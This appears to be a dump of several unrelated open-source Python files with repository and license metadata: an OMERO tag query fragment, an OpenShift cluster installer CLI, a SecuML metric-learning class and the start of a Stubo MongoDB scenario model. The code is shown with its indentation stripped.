qs = conn.getQueryService()
paths = []
# Look for tag in a tagset...
if tag_id is not None:
q = '''
select coalesce(tsowner.id, towner.id),
tagset.id,
ttlink.child.id
from TagAnnotation tagset
join tagset.details.owner tsowner
left outer join tagset.annotationLinks ttlink
left outer join ttlink.child.details.owner towner
where %s
''' % ' and '.join(where_clause)
tagsets = qs.projection(q, params, service_opts)
for e in tagsets:
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'tagset',
'id': e[1].val
})
path.append({
'type': 'tag',
'id': e[2].val
})
paths.append(path)
# If we haven't found tag in tagset, just look for tags with matching IDs
if len(paths) == 0:
where_clause = []
if experimenter_id is not None:
# params.add('eid', rlong(experimenter_id))
where_clause.append(
'coalesce(tsowner.id, towner.id) = :eid')
if tag_id is not None:
# params.add('tid', rlong(tag_id))
where_clause.append(
'tag.id = :tid')
elif tagset_id is not None:
# params.add('tsid', rlong(tagset_id))
where_clause.append(
'tag.id = :tsid')
q = '''
select towner.id, tag.id
from TagAnnotation tag
left outer join tag.details.owner towner
where %s
''' % ' and '.join(where_clause)
tagsets = qs.projection(q, params, service_opts)
for e in tagsets:
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
if tag_id is not None:
t = 'tag'
else:
t = 'tagset'
path.append({
'type': t,
'id': e[1].val
})
paths.append(path)
return paths
|
simleo/openmicroscopy
|
components/tools/OmeroWeb/omeroweb/webclient/show.py
|
Python
|
gpl-2.0
| 37,362 | 0.00008 |
# TODO: Temporarily disabled due to importing old code into openshift-ansible
# repo. We will work on these over time.
# pylint: disable=bad-continuation,missing-docstring,no-self-use,invalid-name,no-value-for-parameter
import click
import os
import re
import sys
from ooinstall import openshift_ansible
from ooinstall import OOConfig
from ooinstall.oo_config import OOConfigInvalidHostError
from ooinstall.oo_config import Host
from ooinstall.variants import find_variant, get_variant_version_combos
DEFAULT_ANSIBLE_CONFIG = '/usr/share/atomic-openshift-utils/ansible.cfg'
DEFAULT_PLAYBOOK_DIR = '/usr/share/ansible/openshift-ansible/'
def validate_ansible_dir(path):
if not path:
raise click.BadParameter('An ansible path must be provided')
return path
# if not os.path.exists(path)):
# raise click.BadParameter("Path \"{}\" doesn't exist".format(path))
def is_valid_hostname(hostname):
if not hostname or len(hostname) > 255:
return False
if hostname[-1] == ".":
hostname = hostname[:-1] # strip exactly one dot from the right, if present
allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def validate_prompt_hostname(hostname):
if '' == hostname or is_valid_hostname(hostname):
return hostname
raise click.BadParameter('"{}" appears to be an invalid hostname. ' \
'Please double-check this value i' \
'and re-enter it.'.format(hostname))
def get_ansible_ssh_user():
click.clear()
message = """
This installation process will involve connecting to remote hosts via ssh. Any
account may be used however if a non-root account is used it must have
passwordless sudo access.
"""
click.echo(message)
return click.prompt('User for ssh access', default='root')
def list_hosts(hosts):
hosts_idx = range(len(hosts))
for idx in hosts_idx:
click.echo(' {}: {}'.format(idx, hosts[idx]))
def delete_hosts(hosts):
while True:
list_hosts(hosts)
del_idx = click.prompt('Select host to delete, y/Y to confirm, ' \
'or n/N to add more hosts', default='n')
try:
del_idx = int(del_idx)
hosts.remove(hosts[del_idx])
except IndexError:
click.echo("\"{}\" doesn't match any hosts listed.".format(del_idx))
except ValueError:
try:
response = del_idx.lower()
if response in ['y', 'n']:
return hosts, response
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
except AttributeError:
click.echo("\"{}\" doesn't coorespond to any valid input.".format(del_idx))
return hosts, None
def collect_hosts(version=None, masters_set=False, print_summary=True):
"""
Collect host information from user. This will later be filled in using
ansible.
Returns: a list of host information collected from the user
"""
click.clear()
click.echo('*** Host Configuration ***')
message = """
You must now specify the hosts that will compose your OpenShift cluster.
Please enter an IP or hostname to connect to for each system in the cluster.
You will then be prompted to identify what role you would like this system to
serve in the cluster.
OpenShift Masters serve the API and web console and coordinate the jobs to run
across the environment. If desired you can specify multiple Master systems for
an HA deployment, in which case you will be prompted to identify a *separate*
system to act as the load balancer for your cluster after all Masters and Nodes
are defined.
If only one Master is specified, an etcd instance embedded within the OpenShift
Master service will be used as the datastore. This can be later replaced with a
separate etcd instance if desired. If multiple Masters are specified, a
separate etcd cluster will be configured with each Master serving as a member.
Any Masters configured as part of this installation process will also be
configured as Nodes. This is so that the Master will be able to proxy to Pods
from the API. By default this Node will be unschedulable but this can be changed
after installation with 'oadm manage-node'.
OpenShift Nodes provide the runtime environments for containers. They will
host the required services to be managed by the Master.
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#master
http://docs.openshift.com/enterprise/latest/architecture/infrastructure_components/kubernetes_infrastructure.html#node
"""
click.echo(message)
hosts = []
more_hosts = True
num_masters = 0
while more_hosts:
host_props = {}
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_hostname)
if not masters_set:
if click.confirm('Will this host be an OpenShift Master?'):
host_props['master'] = True
num_masters += 1
if version == '3.0':
masters_set = True
host_props['node'] = True
#TODO: Reenable this option once container installs are out of tech preview
#rpm_or_container = click.prompt('Will this host be RPM or Container based (rpm/container)?',
# type=click.Choice(['rpm', 'container']),
# default='rpm')
#if rpm_or_container == 'container':
# host_props['containerized'] = True
#else:
# host_props['containerized'] = False
host_props['containerized'] = False
host = Host(**host_props)
hosts.append(host)
if print_summary:
print_installation_summary(hosts)
# If we have one master, this is enough for an all-in-one deployment,
# thus we can start asking if you wish to proceed. Otherwise we assume
# you must.
if masters_set or num_masters != 2:
more_hosts = click.confirm('Do you want to add additional hosts?')
if num_masters >= 3:
collect_master_lb(hosts)
return hosts
def print_installation_summary(hosts):
"""
Displays a summary of all hosts configured thus far, and what role each
will play.
Shows total nodes/masters, hints for performing/modifying the deployment
with additional setup, warnings for invalid or sub-optimal configurations.
"""
click.clear()
click.echo('*** Installation Summary ***\n')
click.echo('Hosts:')
for host in hosts:
print_host_summary(hosts, host)
masters = [host for host in hosts if host.master]
nodes = [host for host in hosts if host.node]
dedicated_nodes = [host for host in hosts if host.node and not host.master]
click.echo('')
click.echo('Total OpenShift Masters: %s' % len(masters))
click.echo('Total OpenShift Nodes: %s' % len(nodes))
if len(masters) == 1:
ha_hint_message = """
NOTE: Add a total of 3 or more Masters to perform an HA installation."""
click.echo(ha_hint_message)
elif len(masters) == 2:
min_masters_message = """
WARNING: A minimum of 3 masters are required to perform an HA installation.
Please add one more to proceed."""
click.echo(min_masters_message)
elif len(masters) >= 3:
ha_message = """
NOTE: Multiple Masters specified, this will be an HA deployment with a separate
etcd cluster. You will be prompted to provide the FQDN of a load balancer once
finished entering hosts."""
click.echo(ha_message)
dedicated_nodes_message = """
WARNING: Dedicated Nodes are recommended for an HA deployment. If no dedicated
Nodes are specified, each configured Master will be marked as a schedulable
Node."""
min_ha_nodes_message = """
WARNING: A minimum of 3 dedicated Nodes are recommended for an HA
deployment."""
if len(dedicated_nodes) == 0:
click.echo(dedicated_nodes_message)
elif len(dedicated_nodes) < 3:
click.echo(min_ha_nodes_message)
click.echo('')
def print_host_summary(all_hosts, host):
click.echo("- %s" % host.connect_to)
if host.master:
click.echo(" - OpenShift Master")
if host.node:
if host.is_dedicated_node():
click.echo(" - OpenShift Node (Dedicated)")
elif host.is_schedulable_node(all_hosts):
click.echo(" - OpenShift Node")
else:
click.echo(" - OpenShift Node (Unscheduled)")
if host.master_lb:
if host.preconfigured:
click.echo(" - Load Balancer (Preconfigured)")
else:
click.echo(" - Load Balancer (HAProxy)")
if host.master:
if host.is_etcd_member(all_hosts):
click.echo(" - Etcd Member")
else:
click.echo(" - Etcd (Embedded)")
def collect_master_lb(hosts):
"""
Get a valid load balancer from the user and append it to the list of
hosts.
Ensure user does not specify a system already used as a master/node as
this is an invalid configuration.
"""
message = """
Setting up High Availability Masters requires a load balancing solution.
Please provide a the FQDN of a host that will be configured as a proxy. This
can be either an existing load balancer configured to balance all masters on
port 8443 or a new host that will have HAProxy installed on it.
If the host provided does is not yet configured, a reference haproxy load
balancer will be installed. It's important to note that while the rest of the
environment will be fault tolerant this reference load balancer will not be.
It can be replaced post-installation with a load balancer with the same
hostname.
"""
click.echo(message)
host_props = {}
# Using an embedded function here so we have access to the hosts list:
def validate_prompt_lb(hostname):
# Run the standard hostname check first:
hostname = validate_prompt_hostname(hostname)
# Make sure this host wasn't already specified:
for host in hosts:
if host.connect_to == hostname and (host.master or host.node):
raise click.BadParameter('Cannot re-use "%s" as a load balancer, '
'please specify a separate host' % hostname)
return hostname
host_props['connect_to'] = click.prompt('Enter hostname or IP address',
value_proc=validate_prompt_lb)
install_haproxy = click.confirm('Should the reference haproxy load balancer be installed on this host?')
host_props['preconfigured'] = not install_haproxy
host_props['master'] = False
host_props['node'] = False
host_props['master_lb'] = True
master_lb = Host(**host_props)
hosts.append(master_lb)
def confirm_hosts_facts(oo_cfg, callback_facts):
hosts = oo_cfg.hosts
click.clear()
message = """
A list of the facts gathered from the provided hosts follows. Because it is
often the case that the hostname for a system inside the cluster is different
from the hostname that is resolveable from command line or web clients
these settings cannot be validated automatically.
For some cloud providers the installer is able to gather metadata exposed in
the instance so reasonable defaults will be provided.
Plese confirm that they are correct before moving forward.
"""
notes = """
Format:
connect_to,IP,public IP,hostname,public hostname
Notes:
* The installation host is the hostname from the installer's perspective.
* The IP of the host should be the internal IP of the instance.
* The public IP should be the externally accessible IP associated with the instance
* The hostname should resolve to the internal IP from the instances
themselves.
* The public hostname should resolve to the external ip from hosts outside of
the cloud.
"""
# For testing purposes we need to click.echo only once, so build up
# the message:
output = message
default_facts_lines = []
default_facts = {}
for h in hosts:
if h.preconfigured == True:
continue
default_facts[h.connect_to] = {}
h.ip = callback_facts[h.connect_to]["common"]["ip"]
h.public_ip = callback_facts[h.connect_to]["common"]["public_ip"]
h.hostname = callback_facts[h.connect_to]["common"]["hostname"]
h.public_hostname = callback_facts[h.connect_to]["common"]["public_hostname"]
default_facts_lines.append(",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, ",".join([h.connect_to,
h.ip,
h.public_ip,
h.hostname,
h.public_hostname]))
output = "%s\n%s" % (output, notes)
click.echo(output)
facts_confirmed = click.confirm("Do the above facts look correct?")
if not facts_confirmed:
message = """
Edit %s with the desired values and run `atomic-openshift-installer --unattended install` to restart the install.
""" % oo_cfg.config_path
click.echo(message)
# Make sure we actually write out the config file.
oo_cfg.save_to_disk()
sys.exit(0)
return default_facts
def check_hosts_config(oo_cfg, unattended):
click.clear()
masters = [host for host in oo_cfg.hosts if host.master]
if len(masters) == 2:
click.echo("A minimum of 3 Masters are required for HA deployments.")
sys.exit(1)
if len(masters) > 1:
master_lb = [host for host in oo_cfg.hosts if host.master_lb]
if len(master_lb) > 1:
click.echo('ERROR: More than one Master load balancer specified. Only one is allowed.')
sys.exit(1)
elif len(master_lb) == 1:
if master_lb[0].master or master_lb[0].node:
click.echo('ERROR: The Master load balancer is configured as a master or node. Please correct this.')
sys.exit(1)
else:
message = """
ERROR: No master load balancer specified in config. You must provide the FQDN
of a load balancer to balance the API (port 8443) on all Master hosts.
https://docs.openshift.org/latest/install_config/install/advanced_install.html#multiple-masters
"""
click.echo(message)
sys.exit(1)
dedicated_nodes = [host for host in oo_cfg.hosts if host.node and not host.master]
if len(dedicated_nodes) == 0:
message = """
WARNING: No dedicated Nodes specified. By default, colocated Masters have
their Nodes set to unschedulable. If you proceed all nodes will be labelled
as schedulable.
"""
if unattended:
click.echo(message)
else:
confirm_continue(message)
return
def get_variant_and_version(multi_master=False):
message = "\nWhich variant would you like to install?\n\n"
i = 1
combos = get_variant_version_combos()
for (variant, version) in combos:
message = "%s\n(%s) %s %s" % (message, i, variant.description,
version.name)
i = i + 1
message = "%s\n" % message
click.echo(message)
if multi_master:
click.echo('NOTE: 3.0 installations are not')
response = click.prompt("Choose a variant from above: ", default=1)
product, version = combos[response - 1]
return product, version
def confirm_continue(message):
if message:
click.echo(message)
click.confirm("Are you ready to continue?", default=False, abort=True)
return
def error_if_missing_info(oo_cfg):
missing_info = False
if not oo_cfg.hosts:
missing_info = True
click.echo('For unattended installs, hosts must be specified on the '
'command line or in the config file: %s' % oo_cfg.config_path)
sys.exit(1)
if 'ansible_ssh_user' not in oo_cfg.settings:
click.echo("Must specify ansible_ssh_user in configuration file.")
sys.exit(1)
# Lookup a variant based on the key we were given:
if not oo_cfg.settings['variant']:
click.echo("No variant specified in configuration file.")
sys.exit(1)
ver = None
if 'variant_version' in oo_cfg.settings:
ver = oo_cfg.settings['variant_version']
variant, version = find_variant(oo_cfg.settings['variant'], version=ver)
if variant is None or version is None:
err_variant_name = oo_cfg.settings['variant']
if ver:
err_variant_name = "%s %s" % (err_variant_name, ver)
click.echo("%s is not an installable variant." % err_variant_name)
sys.exit(1)
oo_cfg.settings['variant_version'] = version.name
missing_facts = oo_cfg.calc_missing_facts()
if len(missing_facts) > 0:
missing_info = True
click.echo('For unattended installs, facts must be provided for all masters/nodes:')
for host in missing_facts:
click.echo('Host "%s" missing facts: %s' % (host, ", ".join(missing_facts[host])))
if missing_info:
sys.exit(1)
def get_missing_info_from_user(oo_cfg):
""" Prompts the user for any information missing from the given configuration. """
click.clear()
message = """
Welcome to the OpenShift Enterprise 3 installation.
Please confirm that following prerequisites have been met:
* All systems where OpenShift will be installed are running Red Hat Enterprise
Linux 7.
* All systems are properly subscribed to the required OpenShift Enterprise 3
repositories.
* All systems have run docker-storage-setup (part of the Red Hat docker RPM).
* All systems have working DNS that resolves not only from the perspective of
the installer but also from within the cluster.
When the process completes you will have a default configuration for Masters
and Nodes. For ongoing environment maintenance it's recommended that the
official Ansible playbooks be used.
For more information on installation prerequisites please see:
https://docs.openshift.com/enterprise/latest/admin_guide/install/prerequisites.html
"""
confirm_continue(message)
click.clear()
if oo_cfg.settings.get('ansible_ssh_user', '') == '':
oo_cfg.settings['ansible_ssh_user'] = get_ansible_ssh_user()
click.clear()
if oo_cfg.settings.get('variant', '') == '':
variant, version = get_variant_and_version()
oo_cfg.settings['variant'] = variant.name
oo_cfg.settings['variant_version'] = version.name
click.clear()
if not oo_cfg.hosts:
oo_cfg.hosts = collect_hosts(version=oo_cfg.settings['variant_version'])
click.clear()
return oo_cfg
def collect_new_nodes():
click.clear()
click.echo('*** New Node Configuration ***')
message = """
Add new nodes here
"""
click.echo(message)
return collect_hosts(masters_set=True, print_summary=False)
def get_installed_hosts(hosts, callback_facts):
installed_hosts = []
for host in hosts:
if(host.connect_to in callback_facts.keys()
and 'common' in callback_facts[host.connect_to].keys()
and callback_facts[host.connect_to]['common'].get('version', '')
and callback_facts[host.connect_to]['common'].get('version', '') != 'None'):
installed_hosts.append(host)
return installed_hosts
# pylint: disable=too-many-branches
# This pylint error will be corrected shortly in separate PR.
def get_hosts_to_run_on(oo_cfg, callback_facts, unattended, force, verbose):
# Copy the list of existing hosts so we can remove any already installed nodes.
hosts_to_run_on = list(oo_cfg.hosts)
# Check if master or nodes already have something installed
installed_hosts = get_installed_hosts(oo_cfg.hosts, callback_facts)
if len(installed_hosts) > 0:
click.echo('Installed environment detected.')
# This check has to happen before we start removing hosts later in this method
if not force:
if not unattended:
click.echo('By default the installer only adds new nodes ' \
'to an installed environment.')
response = click.prompt('Do you want to (1) only add additional nodes or ' \
'(2) reinstall the existing hosts ' \
'potentially erasing any custom changes?',
type=int)
# TODO: this should be reworked with error handling.
# Click can certainly do this for us.
# This should be refactored as soon as we add a 3rd option.
if response == 1:
force = False
if response == 2:
force = True
# present a message listing already installed hosts and remove hosts if needed
for host in installed_hosts:
if host.master:
click.echo("{} is already an OpenShift Master".format(host))
# Masters stay in the list, we need to run against them when adding
# new nodes.
elif host.node:
click.echo("{} is already an OpenShift Node".format(host))
# force is only used for reinstalls so we don't want to remove
# anything.
if not force:
hosts_to_run_on.remove(host)
# Handle the cases where we know about uninstalled systems
new_hosts = set(hosts_to_run_on) - set(installed_hosts)
if len(new_hosts) > 0:
for new_host in new_hosts:
click.echo("{} is currently uninstalled".format(new_host))
# Fall through
click.echo('Adding additional nodes...')
else:
if unattended:
if not force:
click.echo('Installed environment detected and no additional ' \
'nodes specified: aborting. If you want a fresh install, use ' \
'`atomic-openshift-installer install --force`')
sys.exit(1)
else:
if not force:
new_nodes = collect_new_nodes()
hosts_to_run_on.extend(new_nodes)
oo_cfg.hosts.extend(new_nodes)
openshift_ansible.set_config(oo_cfg)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts, verbose)
if error:
click.echo("There was a problem fetching the required information. See " \
"{} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
else:
pass # proceeding as normal should do a clean install
return hosts_to_run_on, callback_facts
@click.group()
@click.pass_context
@click.option('--unattended', '-u', is_flag=True, default=False)
@click.option('--configuration', '-c',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-playbook-directory',
'-a',
type=click.Path(exists=True,
file_okay=False,
dir_okay=True,
readable=True),
# callback=validate_ansible_dir,
default=DEFAULT_PLAYBOOK_DIR,
envvar='OO_ANSIBLE_PLAYBOOK_DIRECTORY')
@click.option('--ansible-config',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-log-path',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default="/tmp/ansible.log")
@click.option('-v', '--verbose',
is_flag=True, default=False)
#pylint: disable=too-many-arguments
#pylint: disable=line-too-long
# Main CLI entrypoint, not much we can do about too many arguments.
def cli(ctx, unattended, configuration, ansible_playbook_directory, ansible_config, ansible_log_path, verbose):
"""
atomic-openshift-installer makes the process for installing OSE or AEP
easier by interactively gathering the data needed to run on each host.
It can also be run in unattended mode if provided with a configuration file.
Further reading: https://docs.openshift.com/enterprise/latest/install_config/install/quick_install.html
"""
ctx.obj = {}
ctx.obj['unattended'] = unattended
ctx.obj['configuration'] = configuration
ctx.obj['ansible_config'] = ansible_config
ctx.obj['ansible_log_path'] = ansible_log_path
ctx.obj['verbose'] = verbose
try:
oo_cfg = OOConfig(ctx.obj['configuration'])
except OOConfigInvalidHostError as e:
click.echo(e)
sys.exit(1)
# If no playbook dir on the CLI, check the config:
if not ansible_playbook_directory:
ansible_playbook_directory = oo_cfg.settings.get('ansible_playbook_directory', '')
# If still no playbook dir, check for the default location:
if not ansible_playbook_directory and os.path.exists(DEFAULT_PLAYBOOK_DIR):
ansible_playbook_directory = DEFAULT_PLAYBOOK_DIR
validate_ansible_dir(ansible_playbook_directory)
oo_cfg.settings['ansible_playbook_directory'] = ansible_playbook_directory
oo_cfg.ansible_playbook_directory = ansible_playbook_directory
ctx.obj['ansible_playbook_directory'] = ansible_playbook_directory
if ctx.obj['ansible_config']:
oo_cfg.settings['ansible_config'] = ctx.obj['ansible_config']
elif 'ansible_config' not in oo_cfg.settings and \
os.path.exists(DEFAULT_ANSIBLE_CONFIG):
# If we're installed by RPM this file should exist and we can use it as our default:
oo_cfg.settings['ansible_config'] = DEFAULT_ANSIBLE_CONFIG
oo_cfg.settings['ansible_log_path'] = ctx.obj['ansible_log_path']
ctx.obj['oo_cfg'] = oo_cfg
openshift_ansible.set_config(oo_cfg)
@click.command()
@click.pass_context
def uninstall(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
click.echo("OpenShift will be uninstalled from the following hosts:\n")
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Uninstall cancelled.")
sys.exit(0)
openshift_ansible.run_uninstall_playbook(verbose)
@click.command()
@click.pass_context
def upgrade(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
# Update config to reflect the version we're targetting, we'll write
# to disk once ansible completes successfully, not before.
old_variant = oo_cfg.settings['variant']
old_version = oo_cfg.settings['variant_version']
if oo_cfg.settings['variant'] == 'enterprise':
oo_cfg.settings['variant'] = 'openshift-enterprise'
version = find_variant(oo_cfg.settings['variant'])[1]
oo_cfg.settings['variant_version'] = version.name
click.echo("Openshift will be upgraded from %s %s to %s %s on the following hosts:\n" % (
old_variant, old_version, oo_cfg.settings['variant'],
oo_cfg.settings['variant_version']))
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Upgrade cancelled.")
sys.exit(0)
retcode = openshift_ansible.run_upgrade_playbook(verbose)
if retcode > 0:
click.echo("Errors encountered during upgrade, please check %s." %
oo_cfg.settings['ansible_log_path'])
else:
oo_cfg.save_to_disk()
click.echo("Upgrade completed! Rebooting all hosts is recommended.")
@click.command()
@click.option('--force', '-f', is_flag=True, default=False)
@click.pass_context
def install(ctx, force):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if ctx.obj['unattended']:
error_if_missing_info(oo_cfg)
else:
oo_cfg = get_missing_info_from_user(oo_cfg)
check_hosts_config(oo_cfg, ctx.obj['unattended'])
print_installation_summary(oo_cfg.hosts)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts,
verbose)
if error:
click.echo("There was a problem fetching the required information. " \
"Please see {} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
hosts_to_run_on, callback_facts = get_hosts_to_run_on(
oo_cfg, callback_facts, ctx.obj['unattended'], force, verbose)
click.echo('Writing config to: %s' % oo_cfg.config_path)
# We already verified this is not the case for unattended installs, so this can
# only trigger for live CLI users:
# TODO: if there are *new* nodes and this is a live install, we may need the user
# to confirm the settings for new nodes. Look into this once we're distinguishing
# between new and pre-existing nodes.
if len(oo_cfg.calc_missing_facts()) > 0:
confirm_hosts_facts(oo_cfg, callback_facts)
oo_cfg.save_to_disk()
click.echo('Ready to run installation process.')
message = """
If changes are needed please edit the config file above and re-run.
"""
if not ctx.obj['unattended']:
confirm_continue(message)
error = openshift_ansible.run_main_playbook(oo_cfg.hosts,
hosts_to_run_on, verbose)
if error:
# The bootstrap script will print out the log location.
message = """
An error was detected. After resolving the problem please relaunch the
installation process.
"""
click.echo(message)
sys.exit(1)
else:
message = """
The installation was successful!
If this is your first time installing please take a look at the Administrator
Guide for advanced options related to routing, storage, authentication and much
more:
http://docs.openshift.com/enterprise/latest/admin_guide/overview.html
"""
click.echo(message)
click.pause()
cli.add_command(install)
cli.add_command(upgrade)
cli.add_command(uninstall)
if __name__ == '__main__':
# This is expected behaviour for context passing with click library:
# pylint: disable=unexpected-keyword-arg
cli(obj={})
|
menren/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
Python
|
apache-2.0
| 31,431 | 0.003213 |
from simple_model import *
|
grollins/foldkin
|
foldkin/simple/__init__.py
|
Python
|
bsd-2-clause
| 27 | 0 |
# SecuML
# Copyright (C) 2016 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import metric_learn
import numpy as np
from .SemiSupervisedProjection import SemiSupervisedProjection
class Itml(SemiSupervisedProjection):
def __init__(self, conf):
SemiSupervisedProjection.__init__(self, conf)
self.projection = metric_learn.itml.ITML_Supervised()
def setProjectionMatrix(self):
self.projection_matrix = np.transpose(
self.pipeline.named_steps['projection'].transformer())
|
ah-anssi/SecuML
|
SecuML/core/DimensionReduction/Algorithms/Projection/Itml.py
|
Python
|
gpl-2.0
| 1,021 | 0 |
"""
:copyright: (c) 2015 by OpenCredo.
:license: GPLv3, see LICENSE for more details.
"""
from pymongo import MongoClient, DESCENDING, ASCENDING
import logging
from bson.objectid import ObjectId
from stubo.utils import asbool
from stubo.model.stub import Stub
import hashlib
import time
import motor
import os
default_env = {
'port': 27017,
'max_pool_size': 20,
'tz_aware': True,
'db': 'stubodb'
}
def coerce_mongo_param(k, v):
if k in ('port', 'max_pool_size'):
return int(v)
elif k in ('tz_aware',):
return asbool(v)
return v
log = logging.getLogger(__name__)
mongo_client = None
def motor_driver(settings):
"""
Returns asynchronous Motor client. If user and password provided in config file - returns authenticated connection
:param settings:
:return:
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = motor.MotorClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
user = settings.get('mongo.user', None)
password = settings.get('mongo.password', None)
if user and password:
uri = "mongodb://{user}:{password}@{host}:{port}/{database_name}".format(
user=user,
password=password,
host=settings['mongo.host'],
port=settings['mongo.port'],
database_name=settings['mongo.db']
)
client = motor.MotorClient(uri)
else:
client = motor.MotorClient(settings['mongo.host'], int(settings['mongo.port']))
return client[settings['mongo.db']]
def get_mongo_client():
return mongo_client
def get_connection(env=None):
"""
Gets MongoDB connection. If user and password provided - authenticates (logs in)
:param env: dictionary, example:
{'host': 'ds045454.mongolab.com',
'tz_aware': True,
'max_pool_size': 10,
'port': 45454}
:return: MongoClient
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = MongoClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
env = env or default_env
_env = env.copy()
dbname = _env.pop('db', None)
# if auth details supplied - getting details
user = password = None
if 'user' in _env:
user = _env.pop('user')
if 'password' in _env:
password = _env.pop('password')
client = MongoClient(**_env)
if dbname:
log.debug('using db={0}'.format(dbname))
client = getattr(client, dbname)
# authenticating
if user and password:
# if fails - throws exception which will be handled in run_stubo.py
client.authenticate(user, password)
log.info("Login to MongoDB successful!")
return client
class Scenario(object):
def __init__(self, db=None):
self.db = db or mongo_client
assert self.db
def get_stubs(self, name=None):
if name:
filter = {'scenario': name}
return self.db.scenario_stub.find(filter)
else:
return self.db.scenario_stub.find()
def get_pre_stubs(self, name=None):
if name:
query = {'scenario': name}
return self.db.pre_scenario_stub.find(query)
else:
return self.db.scenario_pre_stub.find()
def stub_count(self, name):
return self.get_stubs(name).count()
def get(self, name):
return self.db.scenario.find_one({'name': name})
def get_all(self, name=None):
if name:
cursor = self.db.scenario.find({'name': name})
else:
cursor = self.db.scenario.find()
return cursor
def insert(self, **kwargs):
return self.db.scenario.insert(kwargs)
def change_name(self, name, new_name):
"""
Rename scenario and all stubs
:param name: current scenario name
:param new_name: new scenario name
:return: statistics, how many stubs were changed
"""
# updating scenario stub collection. You have to specify all parameters as booleans up to the one that you
# actually want, in our case - the fourth parameter "multi" = True
# update(spec, document[, upsert=False[,
# manipulate=False[, safe=None[, multi=False[, check_keys=True[, **kwargs]]]]]])
response = {
'Old name': name,
"New name": new_name
}
try:
result = self.db.scenario_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Stubs changed'] = result['n']
except Exception as ex1:
# this is probably KeyError, leaving Exception for debugging purposes
log.debug("Could not get STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario stub, got error: %s " % ex)
response['Stubs changed'] = 0
# updating pre stubs
try:
result = self.db.scenario_pre_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Pre stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Pre stubs changed'] = result['n']
except Exception as ex1:
log.debug("Could not get PRE STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario pre stub, got error: %s" % ex)
response['Pre stubs changed'] = 0
try:
# updating scenario itself
result = self.db.scenario.update({'name': name}, {'name': new_name})
try:
response['Scenarios changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Scenarios changed'] = result['n']
except Exception as ex1:
log.debug("Could not get SCENARIO nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario, got error: %s" % ex)
response['Scenarios changed'] = 0
return response
def recorded(self, name=None):
"""
Calculates scenario recorded date. If name is not supplied - returns a dictionary with scenario name and
recorded date:
{ 'scenario_1': '2015-05-07',
'scenario_2': '2015-05-07'}
If a name is supplied - returns recorded date string (since MongoDB does not support DateTimeField).
:param name: optional parameter to get recorded date for specific scenario
:return: <dict> - if name is not supplied, <string> with date - if scenario name supplied.
"""
start_time = time.time()
pipeline = [
{'$group': {
'_id': '$scenario',
'recorded': {'$max': '$recorded'}}}]
# use the pipe to calculate latest date
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['recorded'] for x in result}
